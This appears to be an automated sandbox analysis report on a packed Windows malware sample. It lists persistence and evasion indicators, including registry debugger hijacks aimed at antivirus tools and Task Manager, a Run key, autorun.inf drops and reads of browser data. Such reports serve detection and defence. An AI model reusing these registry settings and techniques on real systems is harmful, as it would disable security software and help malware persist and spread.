69d28d8e343dde25f6a6cd12a50e50137e699863d69638aa5682bc213a28615c

Analysis

max time kernel
150s
max time network
156s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
31/12/2023, 05:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

29aee1ebc452c57d9bfaee973ae89873.exe
Size

27KB
MD5

29aee1ebc452c57d9bfaee973ae89873
SHA1

194151b20390a3a62032edc9de03f018817c060e
SHA256

69d28d8e343dde25f6a6cd12a50e50137e699863d69638aa5682bc213a28615c
SHA512

89a9b537feb77f227f6ba7e3b9d6345e4c7a4381eec1d9f720e9ae46e5154f6a5bf6b37b0c2b47f953ec56743084f89d8d586095be4c578a52c27aa645cbe11d
SSDEEP

768:1GRc7leirgHx1GpQXypO0fsovdeMYxax:6icHrktTfsqsxA

Score

8^/10

evasion persistence spyware stealer upx

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Sets file execution options in registry 2 TTPs 64 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AutoRuns.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPol.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	conhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32X.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScan.kxp\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczj.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safe.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrv.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlp.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMain.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMcl.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsol.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchX.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegClean.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDie.kxp\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSet.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safelive.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTask.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfg.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetup.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchr.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStart.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStub.kxp\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHost.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvc.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1.kxp	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvc.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdate.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMon.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReport.kxp\Debugger = "C:\\Windows\\system32\\Systom.exe"	conhost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvupload.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSword.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetect.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStub.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweep.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenter.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafe.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9x.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ras.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupd.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScn.SCR\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenter.kxp	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgent.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe\Debugger = "C:\\Windows\\system32\\Systom.exe"	reg.exe

Deletes itself 1 IoCs

pid	Process
2908	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3056	Systom.exe

Loads dropped DLL 2 IoCs

pid	Process
3036	29aee1ebc452c57d9bfaee973ae89873.exe
3036	29aee1ebc452c57d9bfaee973ae89873.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 20 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3036-0-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x000a000000012233-2.dat	upx
behavioral1/memory/3036-3-0x0000000000220000-0x0000000000239000-memory.dmp	upx
behavioral1/memory/3056-12-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3036-26-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-46-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-317-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-581-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-643-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-680-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-689-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-692-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-693-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-1069-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-1344-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-1367-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-1390-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-1413-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-1436-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/memory/3056-1459-0x0000000000400000-0x0000000000419000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\crsss = "C:\\Windows\\system32\\Systom.exe"	reg.exe

Enumerates connected drives 3 TTPs 21 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\q:	Systom.exe
File opened (read-only)	\??\v:	Systom.exe
File opened (read-only)	\??\w:	Systom.exe
File opened (read-only)	\??\h:	Systom.exe
File opened (read-only)	\??\l:	Systom.exe
File opened (read-only)	\??\n:	Systom.exe
File opened (read-only)	\??\p:	Systom.exe
File opened (read-only)	\??\t:	Systom.exe
File opened (read-only)	\??\u:	Systom.exe
File opened (read-only)	\??\x:	Systom.exe
File opened (read-only)	\??\z:	Systom.exe
File opened (read-only)	\??\k:	Systom.exe
File opened (read-only)	\??\m:	Systom.exe
File opened (read-only)	\??\o:	Systom.exe
File opened (read-only)	\??\y:	Systom.exe
File opened (read-only)	\??\e:	Systom.exe
File opened (read-only)	\??\j:	Systom.exe
File opened (read-only)	\??\s:	Systom.exe
File opened (read-only)	\??\g:	Systom.exe
File opened (read-only)	\??\i:	Systom.exe
File opened (read-only)	\??\r:	Systom.exe

Drops autorun.inf file 1 TTPs 8 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	\??\c:\auToRun.inf	Systom.exe
File created	\??\f:\auToRun.inf	Systom.exe
File opened for modification	\??\f:\auToRun.inf	Systom.exe
File opened for modification	C:\Windows\SysWOW64\auToRun.inf	Systom.exe
File created	C:\Windows\SysWOW64\auToRun.inf	Systom.exe
File created	C:\auToRun.inf	Systom.exe
File opened for modification	C:\auToRun.inf	Systom.exe
File created	\??\c:\auToRun.inf	Systom.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\auToRun.inf	Systom.exe
File created	C:\Windows\SysWOW64\auToRun.inf	Systom.exe
File created	C:\Windows\SysWOW64\Systom.exe	29aee1ebc452c57d9bfaee973ae89873.exe
File opened for modification	C:\Windows\SysWOW64\Systom.exe	29aee1ebc452c57d9bfaee973ae89873.exe
File created	C:\Windows\SysWOW64\Systom.exe	Systom.exe
File opened for modification	C:\Windows\SysWOW64\Systom.exe	Systom.exe

Drops file in Program Files directory 43 IoCs

description	ioc	Process
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Orange Circles.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsVersion1Warning.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\DADSHIRT.HTM	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsVersion1Warning.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.HTM	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\OFFISUPP.HTM	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Hand Prints.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Bears.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Shades of Blue.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Soft Blue.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Peacock.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\CURRENCY.HTM	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\SEAMARBL.HTM	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.htm	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Green Bubbles.htm	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm	Systom.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\preface.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\JUNGLE.HTM	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Stars.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Stars.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsVersion1Warning.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\PINELUMB.HTM	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Office14\OSPP.HTM	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\TECHTOOL.HTM	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Bears.htm	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm	Systom.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\1033\MCABOUT.HTM	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Green Bubbles.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\PAWPRINT.HTM	Systom.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Orange Circles.htm	Systom.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Hand Prints.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Roses.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Microsoft Office\Stationery\1033\JUDGESCH.HTM	Systom.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm	Systom.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\olh001.htm	Systom.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\README.HTM	Systom.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\404-7.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\404.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-9.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\500-15.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\500-14.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\403-4.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\404-15.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\404.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\x86_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_f35f9773adf74c06\Shades of Blue.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\403-14.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\404-15.htm	Systom.exe
File opened for modification	\??\c:\Windows\ehome\CreateDisc\SonicResources\ClickMe.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\501.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\403-5.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\403-2.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\403-13.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\403-7.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_4f7e32f76654bd3c\Peacock.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\x86_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_f35f9773adf74c06\Green Bubbles.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\404-3.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\403-9.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\403-18.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\401-5.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\500-17.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\500.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\404-1.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\404-11.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-11.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-15.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-5.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_en-us_b87da52fa7e9b700\404-7.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\403-19.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\403.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-mail-app_31bf3856ad364e35_6.1.7601.17514_none_4f7e32f76654bd3c\Bears.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_de-de_0f8ccf36b90bab3b\404-12.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8490213a810a8a5\401-3.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_5b0078129ae2bf07\401.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_it-it_45286e597214a485\403-15.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\401-1.htm	Systom.exe
File opened for modification	\??\c:\Windows\winsxs\amd64_microsoft-windows-i..sbinaries.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_e74ded66652fb660\404-13.htm	Systom.exe
